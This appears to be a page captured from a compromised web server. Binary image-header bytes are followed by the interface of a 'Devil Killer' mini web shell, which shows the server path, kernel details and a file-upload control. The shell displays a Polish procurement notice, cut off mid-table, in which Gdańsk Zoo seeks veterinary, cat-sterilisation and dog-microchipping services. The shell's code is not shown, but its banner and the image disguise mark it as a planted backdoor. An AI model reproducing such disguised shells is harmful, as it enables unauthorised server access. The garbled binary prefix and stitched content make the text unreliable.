JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220420/0012649601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi weterynaryjne dla Schroniska dla bezdomnych zwierząt &#34;PROMYK&#34; i dla Gdańskiego Ogrodu Zoologicznego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gdański Ogród Zoologiczny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190560361</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Karwieńska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-328</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58/5520041</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zoo.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zoo.gda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> ogród zoologiczny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi weterynaryjne dla Schroniska dla bezdomnych zwierząt &#34;PROMYK&#34; i dla Gdańskiego Ogrodu Zoologicznego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-78015103-b18d-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00126496</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020636/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Usługi weterynaryjne: a) usługi dla ZOO b) usługi dla Schroniska c) sterylizacja i kastracja wolno bytujących kotów d) identyfikacja psów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim,. 2.	Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:- miniPortalu https://miniportal.uzp.gov.pl/, <br/>- elektronicznej skrzynki podawczej ePUAP - /ZOO Gdańsk/Skrytka ESP<br/>- poczty elektronicznej – zpubliczne@zoo.gda.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.	Opis sposobu przygotowania ofert:<br/>1)Oferta powinna być sporządzona w języku polskim, oraz złożona pod rygorem nieważności , w formie elektronicznej lub postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Składanie ofert odbywa się przy użyciu miniPortalu: https://miniportal.uzp.gov.pl/<br/>2)Zamawiający wymaga, żeby oferta została sporządzona na formularzach załączonych do niniejszej specyfikacji warunków zamówienia: - formularz ofertowy oraz formularze cenowe.<br/>3)Załącznikami do oferty, stanowiącymi jej integralną część, są dokumenty wymienione w SWZ. Oferta i każdy z załączników powinny zostać podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez Wykonawcę lub osobę upoważnioną do jego reprezentowania i składania w jego imieniu oświadczenia woli. Wyjątek stanowi zobowiązanie innego podmiotu do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia które kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym podpisuje podmiot udostępniający zasoby.<br/>4)W przypadku, gdy Wykonawcę reprezentuje inna osoba (pełnomocnik), do oferty musi być załączone pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy. Dokument składa się w formie elektronicznej, w postaci elektronicznej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, w formie pisemnej lub w formie dokumentowej, w zakresie i w sposób określony w przepisach wydanych na podstawie art. 70 ustawy.<br/>5.	Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na miniPortalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Rozdział 16 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Rozdział 16 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.U.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług weterynaryjnych przez zakład weterynaryjny dla potrzeb Schroniska dla Bezdomnych Zwierząt w Gdańsku, w zakresie przeprowadzania diagnostyki, udzielania pierwszej pomocy oraz innych zabiegów niemożliwych do wykonania w warunkach Schroniska, albo świadczonych podczas nieobecności schroniskowego lekarza weterynarii. <br/>Istotne warunki zamówienia:<br/>a)	maksymalna odległość dojazdu samochodem do zakładu weterynaryjnego ze Schroniska: 15 km, ze względu na ograniczenie kosztów oraz czasu dojazdu,<br/>b)	godziny prowadzenia działalności przez zakład weterynaryjny: <br/>24 godziny/dobę,<br/>c)	świadczenie usług weterynaryjnych przez wszystkie dni tygodnia,<br/>d)	zwierzęta przywożone przez Schronisko przyjmowane są poza kolejnością<br/>( chodzi tylko o przyjęcie, a nie leczenie zwierzęcia ),<br/>e)	zakres świadczonych usług ( podane ilości są orientacyjne ):<br/><br/>1. Wizyta (postawienie diagnozy + ustalenie leczenia) - 140<br/>2. Kontynuacja leczenia - 40<br/>3. Hospitalizacja – 60<br/>4. Zastrzyk – 30 <br/>5. Toaleta rany – 10 <br/>6. Opatrunek – 10 <br/>7. Toaleta uszu - 5<br/>8. RTG – 120 zdjęć wraz z opisem<br/>9. USG – 10<br/>10. Echo serca - 10<br/>11. Kroplówka - 30<br/>12. Cewnikowanie<br/>13. Lewatywa<br/>14. Eutanazja – 8 zwierząt o średniej masie ciała 20 kg<br/>15. Eutanazja (ślepy miot) – 150 zwierząt<br/>16. RTG stomatologiczne 10 <br/><br/><br/> ZABIEGI CHIRURGICZNE<br/><br/>1. Usunięcie ropomacicza<br/>2. Skręt żołądka <br/>3. Osteosynteza kończyny przedniej lub tylnej - 4<br/>4. Szycie rany – 15<br/>5.Szycie podniebienia twardego 2<br/>6. Rhinoskopia 2<br/>7. Usunięcie gałki ocznej<br/>8. Osteosynteza żuchwy<br/>9. Szycie jelit<br/>10. Usunięcia kamicy pęcherza moczowego<br/>11. Usunięcie nerki<br/>12. pomoc przy porodzie<br/>13. Plastyka powiek<br/>14. Amputacja kończyny przedniej<br/>15. Amputacja kończyny tylnej<br/>16. Amputacja palca<br/>17. Amputacja ogona<br/>18, Amputacja ucha<br/>19. Usunięcie krwiaka ucha<br/>20. Usunięcie śledziony<br/>21. Usunięcie wypadnięcia pochwy<br/>22. Usunięcie guzów pochwy<br/>23. Usunięcie przepukliny pourazowej : pachwinowej, brzusznej <br/>24. Usunięcie ciała obcego z żołądka lub jelit<br/>25. Usunięcie fragmentu jelita<br/>26. Sterylizacja suki<br/>27. Kastracja psa<br/>28. Usunięcie głowy kości udowej<br/>29. Repozycja jelita – 2<br/>30. Opatrunek usztywniający – 7<br/>31. Sanacja jamy ustnej<br/>32. Badanie diagnostyczne specjalistyczne (tomografia komputerowa, rezonans magnetyczny)<br/>33. W wyjątkowych sytuacjach przy nieobecności (dłużej niż 4 dni ) obojga lekarzy weterynarii zatrudnionych w schronisku udzielenia wsparcia weterynaryjnego na terenie jednostki. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">możliwość leczenia stacjonarnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługi weterynaryjne dla ogrodu Zoologicznego;<br/>Badanie USG dla małych zwierząt 8<br/>Badania RTG dla małych zwierząt 2<br/>Badanie USG dla dużych zwierząt 2<br/>Badanie RTG dla dużych zwierząt 2<br/>szczegóły w załaczniku 1b </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">specjalista chorób zwierzat nieudomowionych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługi sterylizacji i kastracji wolno bytujących kotów na obszarze administracyjnym miasta Gdańska w 2022r. - szczególy w załaczniku nr 1c<br/>Przedmiotem zamówienia jest usługa sterylizacji i kastracji wykonana przez lekarzy weterynarii posiadających prawo wykonywania zawodu, spełniających wymogi ustawy <br/>z dnia 18 grudnia 2003 r. o zakładach leczniczych dla zwierząt (Dz. U. Z 2004 r. Nr 11, poz. 95)<br/><br/>1. Sterylizacja i kastracja winna odbywać się w zakładach leczniczych znajdujących się na terenie Miasta Gdańska.<br/>1.1. Przewidywana (orientacyjna) ilość sterylizacji i kastracji w danych rejonach w okresie obowiązywania umowy:<br/><br/>Rejonu	Rejon Miasta	Orientacyjna ilość sterylizacji kotek/ilość kastracji kotów<br/>1.	Osowa, Matarnia, Kokoszki	38 s / 63 k<br/>2.	Orunia - Św.Wojciech - Lipce, Ujeścisko, Chełm, Jasień	38 s / 63 k<br/>3.	Wzgórze Mickiewicza, Piecki -Migowo, Suchanino, Siedlce	38 s / 63 k<br/>4.	Śródmieście, Olszynka, Rudniki, Wyspa Sobieszowska, Krakowiec – Górki Zachodnie, Stogi, Przeróbka	38 s / 63 k<br/>5.	Aniołki, Młyniska, Letnica, Nowy Port, Brzeźno, Zaspa – Rozstaje, Zaspa – Młyniec, Wrzeszcz Dolny i Górny	38 s / 63 k<br/>6.	Brętowo, VII Dwór, Strzyża, Przymorze Małe, Przymorze Wielkie, Żabianka – Wejhera – Jelitkowo, Tysiąclecia, Oliwa	38 s / 63 k<br/> 1.3. Ilość sterylizacji i kastracji w okresie obowiązywania umowy w zależności <br/>od posiadanych środków finansowych i potrzeb może ulec zmniejszeniu. <br/>Ilość sterylizacji i kastracji, dla wszystkich rejonów, nie może przekroczyć planowanej liczby 606 zabiegów. <br/>1.3.a. Zamawiający odrzuci ofertę z najniższą ceną, jeżeli ta cena będzie niższa o ponad 30% od średniej cen złożonych ofert dla wszystkich rejonów.<br/><br/>2.	Realizacja usług, o których mowa w pkt.1 polega na:<br/>2.1. Wykonaniu sterylizacji i kastracji kotów w rejonach Miasta wskazanych w pkt. 1.1.<br/> 2.1.a. Wykonanie usługi powinno odbywać się w zakładach weterynaryjnych <br/> posiadających pomieszczenia do wykonywania zabiegu sterylizacji i kastracji oraz<br/> warunki do opieki nad chorym kotem. Na terenie zakładu weterynaryjnego powinny<br/> znajdować się klatki kennelowe, umożliwiające leczenie stacjonarne chorych kotów w<br/> czasie pobytu w lecznicy. Zakłady muszą posiadać wyposażenie w legowisko, kuwetę,<br/> miski.<br/>2.2. Badaniu ogólnego stanu zdrowia kotów, które stanowi czynnik dopuszczający do wykonania właściwego zabiegu.<br/>2.3. Wykonaniu zabiegu sterylizacji i kastracji kotów zgodnie z zasadami profesjonalnego świadczenia usług weterynaryjnych.<br/>2.4. Zapewnieniu 24-godzinnej właściwej opieki weterynaryjnej po wykonaniu zabiegu, do chwili przekazania kotów społecznemu opiekunowi.<br/>2.5. Przekazaniu kota społecznemu opiekunowi, który kota dostarczył.<br/>2.6. Prowadzeniu rejestru wykonanych usług wg. wzorów kart wykonanych sterylizacji i kastracji kotów dostarczonych przez Zamawiającego.<br/>2.7. Przesłaniu (wraz z fakturami za wykonane usługi) w okresie trwania umowy do Schroniska dla Bezdomnych Zwierząt w Gdańsku – Kokoszkach ul. Przyrodników 14, oryginału kart wykonanych sterylizacji i kastracji kotów. Ostatnia karta wykonanych zabiegów winna być przekazana nie później niż do 10 grudnia 2022 r.<br/>2.8. Wynagrodzenie za wykonaną usługę będzie uiszczane przelewem na konto bankowe Wykonawcy na podstawie dostarczonej raz na miesiąc faktury w terminie 21 dni od daty jej otrzymania.<br/>3. W przypadku stwierdzenia przez lekarza weterynarii (podczas badania klinicznego ogólnego) chorób przewlekłych, zagrażających życiu kota, zakaźnych lub innych czynników, które mogą mieć wpływ na nieprawidłowe funkcjonowania kota na wolności, dopuszcza się uśpienie zwierzęcia i przekazanie jego zwłok do utylizacji. <br/>Decyzję o konieczności eutanazji zwierzęcia podejmuje lekarz weterynarii.<br/>4. Koty do zabiegu sterylizacji lub kastracji będą w terminie ustalonym z lekarzem weterynarii wykonującym usługę dostarczane, a po wykonanym zabiegu i 24-godzinnym okresie opieki odbierane we własnym zakresie przez Społecznych Opiekunów zwierząt, których lista ustalona zostanie przekazana Wykonawcy przez Zamawiającego w dniu podpisania umowy. (Stanowi załącznik do umowy).<br/>5. Społeczni Opiekunowie dostarczający koty do sterylizacji lub kastracji nie będą obciążani żadnymi kosztami z tytułu realizacji przez wykonawcę niniejszej umowy oraz nie będą otrzymywać wynagrodzenia za wykonane czynności.<br/> 6. Zamawiający zezwala na składanie ofert częściowych na poszczególne rejony<br/> (dzielnice).<br/>Wykonawcy muszą posiadać:<br/>Wpis do rejestru zakładów leczniczych dla zwierząt.<br/>Rejestr prowadzi Kaszubsko-Pomorska Izba Lekarsko-Weterynaryjna.<br/>Termin wykonania przedmiotu zamówienia: od dnia zawarcia umowy do dnia 30.11.2022 roku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostępność zakładów leczniczych w rejonie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wszczepienie elektronicznych identyfikatorów psom właścicieli zamieszkałych na obszarze administracyjnym Miasta Gdańska w 2022 roku. - <br/>Przedmiotem zamówienia jest usługa wszczepiania elektronicznych identyfikatorów przez lekarzy weterynarii wykonana przez lekarzy weterynarii posiadających prawo wykonywania zawodu, spełniających wymogi ustawy z dnia 18 grudnia 2003 r. <br/>o zakładach leczniczych dla zwierząt (Dz. U. Z 2004 r. Nr 11, poz. 95).<br/><br/>1. Wszczepienie elektronicznych identyfikatorów winno odbywać się w zakładach leczniczych znajdujących się na terenie Miasta Gdańska.<br/>1.1. Przewidywana (orientacyjna) ilość identyfikacji w danych rejonach w okresie obowiązywania umowy:<br/><br/>Rejonu	Rejon Miasta	Ilość zabiegów<br/>1.	Kokoszki, Matarnia, Osowa	100<br/>2.	Chełm, Jasień, Orunia-Św. Wojciech – Lipce, Ujeścisko	